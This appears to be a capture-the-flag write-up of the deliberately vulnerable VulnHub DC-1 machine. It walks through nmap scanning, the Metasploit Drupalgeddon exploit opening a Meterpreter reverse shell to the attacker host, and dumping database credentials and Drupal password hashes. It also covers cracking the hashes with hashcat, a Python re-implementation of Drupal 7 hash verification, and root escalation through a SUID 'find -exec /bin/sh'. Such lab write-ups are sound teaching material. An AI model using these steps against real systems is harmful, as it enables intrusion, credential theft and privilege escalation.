VulnHub DC-1

Vulnhub DC-1 CTF hacking challenge. With the DC-1 machine from Vulnhub we get a bit closer to what hacking a real machine looks like.

I have discussed all the steps and screenshots along with the output here, which will reduce any confusion; the writeup may seem long due to the many screenshots but is actually a 10-minute thing to do.

Download the VulnHub DC-1 Machine – https://www.vulnhub.com/entry/dc-1,292/

NOTE: I have revisited the post and updated a few things, so if you notice a difference between the pictures and the text, don't worry about msf5 -> msf6 and dc-1 -> dc-1.vulnhub.

Discover the machine on the network with netdiscover or an nmap range scan.
netdiscover your whole network, or, if you know the interface vmware is connected to (vmnet0, vmnet1 for Host-Only, vmnet8 for NAT), scan just that interface:
netdiscover -i vmnet8
Added the machine IP to the hosts file with the name dc-1.
Now run an nmap scan to find the open ports, the services running and their version numbers.

root@ETHICALHACKX:~# nmap -sV -p- -T5 -Pn -A dc-1.vulnhub
-sV to get the services and the version numbers of those services
-p- to scan all 65535 ports
-T5 to scan at insane speed; do not do this in a production environment, as any basic firewall or IPS/IDS will detect it. You may go with -T3 or lower.
-Pn no ping, as we already know the host is up
-A for aggressive scan (OS detection, version detection, script scanning and traceroute)
dc-1 is the machine name I put in the hosts file against the IP; you may use the IP address here instead.

Now, on running the nmap command in the terminal, the output is:

┌──(abhinav㉿ETHICALHACKX)-[~/vulnhub/dc-1]
└─$ sudo nmap -sC -sV -A -T5 -O -p- dc-1.vulnhub
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 21:14 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for dc-1.vulnhub (192.168.56.104)
Host is up (0.0020s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35046/tcp6  status
|   100024  1          46089/udp   status
|   100024  1          47523/udp6  status
|_  100024  1          49565/tcp   status
49565/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:AA:94:9F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   2.00 ms dc-1.vulnhub (192.168.56.104)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.07 seconds
nmap scan of dc-1

So from the above nmap result we see we have Drupal 7 hosted on port 80:
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian)) Running Drupal
111/tcp open rpcbind 2-4 (RPC #100000)

We have some attack surface here and we proceed with Drupal, opening the machine IP in our browser to explore Drupal 7.
We can try some user enumeration to see if we get lucky on the Drupal login page,
or jump to exploits to see if we have anything in our arsenal against Drupal 7.

Vulnhub DC-1 Drupal 7

In Metasploit we search for Drupal exploits; fire up Metasploit with msfconsole.

┌──(abhinav㉿ETHICALHACKX)-[~/vulnhub/dc-1]
└─$ msfconsole
[!] The following modules could not be loaded!..-
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] Please see /home/abhinav/.msf4/logs/framework.log for details.
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v6.0.44-dev                          ]
+ -- --=[ 2131 exploits - 1139 auxiliary - 363 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: After running db_nmap, be sure to 
check out the result of hosts and services

msf6 > 
search drupal
Search drupal in metasploit

From the list we get, we choose one of the exploits and load it with the use command.

msf6 > search drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval

We should choose one with rank Excellent, although that is not mandatory.
So we choose exploit/multi/http/drupal_drupageddon.
In msfconsole type: use exploit/multi/http/drupal_drupageddon
To see the available options for this particular exploit, type show options.

msf5 > use exploit/multi/http/drupal_drupageddon
msf5 exploit(multi/http/drupal_drupageddon) > show options

Module options (exploit/multi/http/drupal_drupageddon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The target URI of the Drupal installation
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Drupal 7.0 - 7.31 (form-cache PHP injection method)

Set RHOSTS to dc-1 or to the machine IP.

msf5 exploit(multi/http/drupal_drupageddon) > set rhost dc-1
rhost => dc-1
msf6 exploit(unix/webapp/drupal_coder_exec) > use exploit/multi/http/drupal_drupageddon
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/drupal_drupageddon) > show options

Module options (exploit/multi/http/drupal_drupageddon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The target URI of the Drupal installation
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Drupal 7.0 - 7.31 (form-cache PHP injection method)


msf6 exploit(multi/http/drupal_drupageddon) > set RHOSTS dc-1.vulnhub
RHOSTS => dc-1.vulnhub
msf6 exploit(multi/http/drupal_drupageddon) > set LHOST 192.168.56.102
LHOST => 192.168.56.102

Now we are all set to launch the exploit, so type run or exploit.

msf6 exploit(multi/http/drupal_drupageddon) > run

[*] Started reverse TCP handler on 192.168.56.102:4444 
[*] Sending stage (39282 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.104:34178) at 2021-05-24 21:35:31 -0400

meterpreter > 

Finally we have a reverse Meterpreter shell. Once we are on the machine, the first thing to do is find out who we are (which user), since that tells us our permissions. Type getuid.

meterpreter > getuid
Server username: www-data (33)

Going through the files in the current directory with ls gives us our first flag, flag1.txt.

meterpreter > ls
Listing: /var/www
.
.
flag1

Viewing the contents of flag1.txt gives us another hint, pointing towards the Drupal CMS config file.

meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.
meterpreter > getuid
Server username: www-data (33)
meterpreter > ls
Listing: /var/www
=================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  174    fil   2013-11-20 15:45:59 -0500  .gitignore
100644/rw-r--r--  5767   fil   2013-11-20 15:45:59 -0500  .htaccess
100644/rw-r--r--  1481   fil   2013-11-20 15:45:59 -0500  COPYRIGHT.txt
100644/rw-r--r--  1451   fil   2013-11-20 15:45:59 -0500  INSTALL.mysql.txt
100644/rw-r--r--  1874   fil   2013-11-20 15:45:59 -0500  INSTALL.pgsql.txt
100644/rw-r--r--  1298   fil   2013-11-20 15:45:59 -0500  INSTALL.sqlite.txt
100644/rw-r--r--  17861  fil   2013-11-20 15:45:59 -0500  INSTALL.txt
100755/rwxr-xr-x  18092  fil   2013-11-01 06:14:15 -0400  LICENSE.txt
100644/rw-r--r--  8191   fil   2013-11-20 15:45:59 -0500  MAINTAINERS.txt
100644/rw-r--r--  5376   fil   2013-11-20 15:45:59 -0500  README.txt
100644/rw-r--r--  9642   fil   2013-11-20 15:45:59 -0500  UPGRADE.txt
100644/rw-r--r--  6604   fil   2013-11-20 15:45:59 -0500  authorize.php
100644/rw-r--r--  720    fil   2013-11-20 15:45:59 -0500  cron.php
100644/rw-r--r--  52     fil   2019-02-19 08:20:46 -0500  flag1.txt
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  includes
100644/rw-r--r--  529    fil   2013-11-20 15:45:59 -0500  index.php
100644/rw-r--r--  703    fil   2013-11-20 15:45:59 -0500  install.php
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  misc
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  modules
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  profiles
100644/rw-r--r--  1561   fil   2013-11-20 15:45:59 -0500  robots.txt
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  scripts
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  sites
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  themes
100644/rw-r--r--  19941  fil   2013-11-20 15:45:59 -0500  update.php
100644/rw-r--r--  2178   fil   2013-11-20 15:45:59 -0500  web.config
100644/rw-r--r--  417    fil   2013-11-20 15:45:59 -0500  xmlrpc.php

meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.
meterpreter > 

I searched on Google to find out that the Drupal config file is at – sites/default/settings.php

meterpreter > cd sites/default
meterpreter > ls
Listing: /var/www/sites/default
Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  23202  fil   2013-11-21 02:15:59 +0530  default.settings.php
40775/rwxrwxr-x   4096   dir   2019-02-19 18:40:31 +0530  files
100444/r--r--r--  15989  fil   2019-02-19 19:18:01 +0530  settings.php

We view the contents of settings.php; again we type cat settings.php.

meterpreter > cat settings.php
<?php
/**
 *
flag2
Brute force and dictionary attacks aren't the
only ways to gain access (and you WILL need access).
What can you do with these credentials?
*
*/
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',

Here we get our second flag at the top of the file, and right below it the username and password for the Drupal database of dc-1.

Brute force and dictionary attacks aren’t the only ways to gain access (and you WILL need access). What can you do with these credentials?

We use Python to spawn a pty (a pseudo-terminal shell) so that we can work with the database client interactively.

python -c 'import pty; pty.spawn("/bin/sh")'

We browse the Drupal database now and look for something worthwhile.

meterpreter > shell
Process 3436 created.
Channel 2 created.
python -c 'import pty; pty.spawn("/bin/sh")'
$ mysql -u dbuser -p
mysql -u dbuser -p
Enter password: R0ck3t
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 137

Server version: 5.5.60-0+deb7u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
2 rows in set (0.00 sec)

So we explore the drupaldb database further; we might find some usernames and passwords here.

mysql> use drupaldb;
 use drupaldb;
 Reading table information for completion of table and column names
 You can turn off this feature to get a quicker startup with -A
 Database changed
 mysql>

We try to find something useful in the drupaldb database, like a users table.

mysql> show tables;
 show tables;
 +-----------------------------+
 | Tables_in_drupaldb          |
 +-----------------------------+
 | actions                     |
 | authmap                     |
 | batch                       |
 | block                       |
 | block_custom                |
 | block_node_type             |
 | block_role                  |
 | blocked_ips                 |
 | cache                       |
 | cache_block                 |
 | cache_bootstrap             |
 | cache_field                 |
 | cache_filter                |
 | cache_form                  |
 | cache_image                 |
 | cache_menu                  |
 | cache_page                  |
 | cache_path                  |
 | cache_update                |
 | cache_views                 |
 | cache_views_data            |
 | comment                     |
 | ctools_css_cache            |
 | ctools_object_cache         |
 | date_format_locale          |
 | date_format_type            |
 | date_formats                |
 | field_config                |
 | field_config_instance       |
 | field_data_body             |
 | field_data_comment_body     |
 | field_data_field_image      |
 | field_data_field_tags       |
 | field_revision_body         |
 | field_revision_comment_body |
 | field_revision_field_image  |
 | field_revision_field_tags   |
 | file_managed                |
 | file_usage                  |
 | filter                      |
 | filter_format               |
 | flood                       |
 | history                     |
 | image_effects               |
 | image_styles                |
 | menu_custom                 |
 | menu_links                  |
 | menu_router                 |
 | node                        |
 | node_access                 |
 | node_comment_statistics     |
 | node_revision               |
 | node_type                   |
 | queue                       |
 | rdf_mapping                 |
 | registry                    |
 | registry_file               |
 | role                        |
 | role_permission             |
 | search_dataset              |
 | search_index                |
 | search_node_links           |
 | search_total                |
 | semaphore                   |
 | sequences                   |
 | sessions                    |
 | shortcut_set                |
 | shortcut_set_users          |
 | system                      |
 | taxonomy_index              |
 | taxonomy_term_data          |
 | taxonomy_term_hierarchy     |
 | taxonomy_vocabulary         |
 | url_alias                   |
 | users                       |
 | users_roles                 |
 | variable                    |
 | views_display               |
 | views_view                  |
 | watchdog                    |
 +-----------------------------+
 80 rows in set (0.00 sec)

We check the users table to see if we get anything here.

mysql> select * from users;
 select * from users;
 +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
 | uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
 +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
 |   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
 |   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1563777450 | 1563777450 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
 |   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
 +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
 3 rows in set (0.00 sec)

So we have usernames and passwords in hash form here, which we will of course try to crack with hashcat or any other application of your choice.

I have copied the hash into a separate file, say hash.txt, and I will use one of the Kali Linux default wordlists – rockyou.txt. You can locate rockyou.txt with locate rockyou.txt

root@ETHICALHACKX:~# hashcat -m 7900 hash.txt rockyou.txt

After the hash is cracked we know the admin's password is – 53cr3t
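To see what hashcat mode 7900 is actually computing on the $S$ hashes from the users table, here is an added example (not code from the DC-1 machine or from Drupal itself) that re-implements Drupal 7's password scheme from includes/password.inc: the first 12 characters of the stored value are the setting (algorithm tag, iteration-count character, 8-character salt), the rest is an SHA-512 chain of 2^count_log2 rounds in phpass-style base64, truncated to 55 characters. The admin hash below is the one shown in the writeup; the salt and cost used in the demo are constructed. Parsing the stored cost is also how a defender checks whether a site is still running the stock 2^15 rounds that a rockyou dictionary gets through in seconds.

```python
"""Drupal 7 ($S$) password hashes: parse the setting string and verify a
candidate password the way user_check_password() does.

Added example for this writeup; it mirrors the algorithm of Drupal 7's
includes/password.inc (SHA-512, 2**count_log2 rounds, phpass base64).
"""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55                   # DRUPAL_HASH_LENGTH: stored value is cut here
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30


def _phpass_b64(data: bytes) -> str:
    """phpass/Drupal base64 variant: 6 bits per char, little-endian groups."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(stored: str):
    """Return (count_log2, salt) from the first 12 chars of a $S$ hash."""
    setting = stored[:12]
    if len(setting) != 12 or not setting.startswith("$S$"):
        raise ValueError("not a Drupal 7 $S$ hash")
    count_log2 = ITOA64.index(setting[3])
    if not MIN_COUNT_LOG2 <= count_log2 <= MAX_COUNT_LOG2:
        raise ValueError("iteration count outside Drupal's accepted range")
    return count_log2, setting[4:12]


def drupal7_hash(password: str, salt: str, count_log2: int) -> str:
    """Hash `password` exactly as Drupal 7 would with this salt and cost."""
    if len(salt) != 8 or any(c not in ITOA64 for c in salt):
        raise ValueError("salt must be 8 chars from the itoa64 alphabet")
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):          # PHP: do { ... } while (--count)
        digest = hashlib.sha512(digest + pw).digest()
    setting = "$S$" + ITOA64[count_log2] + salt
    return (setting + _phpass_b64(digest))[:HASH_LENGTH]


def drupal7_verify(password: str, stored: str) -> bool:
    """True if `password` matches the stored $S$ hash (constant-time compare)."""
    count_log2, salt = parse_setting(stored)
    return hmac.compare_digest(drupal7_hash(password, salt, count_log2), stored)


# Sample taken from the users table shown in the writeup.
ADMIN_HASH = "$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR"

if __name__ == "__main__":
    log2, salt = parse_setting(ADMIN_HASH)
    print(f"cost 2**{log2} = {1 << log2} SHA-512 rounds, salt {salt!r}")
    # Candidate from the writeup's own hashcat result.
    print("53cr3t matches:", drupal7_verify("53cr3t", ADMIN_HASH))
```

The 'D' in the fourth position decodes to count_log2 = 15, i.e. 32768 rounds, which is Drupal 7's default and is cheap enough that a single CPU core tests hundreds of candidates per second; raising the cost or moving accounts to a stronger scheme is the mitigation the flag-2 hint is alluding to.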

So now we log in to the Drupal website of dc-1 and explore further; under the Content menu we find the third flag, flag3, which says:

Special PERMS will help FIND the passwd – but you’ll need to -exec that command to work out how to get what’s in the shadow.

The SUID bit makes an executable run with the privileges of its owner (root, for the binaries below), even when a different user launches it. So run the following command to find out which files have it set.

find / -perm -u=s -type f 2>/dev/null
mysql> exit                                 
 exit
 Bye
 $ find / -perm -u=s -type f 2>/dev/null
 find / -perm -u=s -type f 2>/dev/null
 /bin/mount
 /bin/ping
 /bin/su
 /bin/ping6
 /bin/umount
 /usr/bin/at
 /usr/bin/chsh
 /usr/bin/passwd
 /usr/bin/newgrp
 /usr/bin/chfn
 /usr/bin/gpasswd
 /usr/bin/procmail
 /usr/bin/find
 /usr/sbin/exim4
 /usr/lib/pt_chown
 /usr/lib/openssh/ssh-keysign
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /sbin/mount.nfs

So we see the find command has the SUID bit set, which means we can execute find as root: we saw earlier that we are actually www-data, but executing find will run it as root.

We take a look at the passwd file; that is always an interesting thing to do on Linux.

pwd
 /var/www/sites/default
 $ cat /etc/passwd
 cat /etc/passwd
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bin/sh
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 Debian-exim:x:101:104::/var/spool/exim4:/bin/false
 statd:x:102:65534::/var/lib/nfs:/bin/false
 messagebus:x:103:107::/var/run/dbus:/bin/false
 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
 flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::

Guess what, we see flag4 in the passwd file. So we again crack the password, which is a hash, the same way as earlier with john or hashcat.

The flag4 values are altered in the picture because I was having fun with the machine.

Now for the final flag: let's navigate to /root. We see an error, so let's elevate our privileges. Let's check if we can.

find ethicalhackx -exec "/bin/sh" \;

Now check the current user with whoami, and we are root.
Let's get the final flag.

whoami 
root
pwd
/tmp
cd ..
cd root
ls
thefinalflag.txt
cat thefinalflag.txt
Well done!!!! Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

So this Vulnhub machine is done. We will post more interesting CTFs soon, and each step in every CTF will be covered in detail in a separate post.
